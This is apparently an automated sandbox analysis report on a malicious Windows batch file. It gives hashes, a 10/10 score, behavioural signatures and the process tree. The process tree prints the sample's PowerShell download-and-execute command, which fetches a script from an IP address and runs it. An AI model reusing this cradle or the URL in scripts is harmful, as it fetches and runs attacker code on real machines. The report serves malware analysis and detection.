Analysis
-
max time kernel
82s -
max time network
127s -
platform
windows10_x64 -
resource
win10 -
submitted
20-06-2020 08:10
Static task
static1
Behavioral task
behavioral1
Sample
f4bc334e44b117b825bf6ea74bf8306a.bat
Resource
win7v200430
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
f4bc334e44b117b825bf6ea74bf8306a.bat
Resource
win10
windows10_x64
0 signatures
0 seconds
General
-
Target
f4bc334e44b117b825bf6ea74bf8306a.bat
-
Size
213B
-
MD5
77b3d11eb5df3e1e5555caf2db33be1c
-
SHA1
1e66e03c4214e808d5d4b796d372938862be3cbd
-
SHA256
94d5147f9349eb4d28ca422092c7f0d81b4085c4ca82d9a88e465ae8d38edea0
-
SHA512
dba1003d91200c9f488ecf18ef70bd5177914c9a69d811185bcff4a7e0512419db4a7698cfc1a8618677c12d8f8d9b5322102e4bf8898a2c5314d48e34da7606
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/f4bc334e44b117b825bf6ea74bf8306a
Signatures
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 3900 3924 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 3900 WerFault.exe Token: SeBackupPrivilege 3900 WerFault.exe Token: SeDebugPrivilege 3900 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
WerFault.exepid process 3900 WerFault.exe 3900 WerFault.exe 3900 WerFault.exe 3900 WerFault.exe 3900 WerFault.exe 3900 WerFault.exe 3900 WerFault.exe 3900 WerFault.exe 3900 WerFault.exe 3900 WerFault.exe 3900 WerFault.exe 3900 WerFault.exe 3900 WerFault.exe 3900 WerFault.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 3788 wrote to memory of 3924 3788 cmd.exe powershell.exe PID 3788 wrote to memory of 3924 3788 cmd.exe powershell.exe PID 3788 wrote to memory of 3924 3788 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\f4bc334e44b117b825bf6ea74bf8306a.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3788 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/f4bc334e44b117b825bf6ea74bf8306a');Invoke-NQONAR;Start-Sleep -s 10000"2⤵PID:3924
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3924 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:3900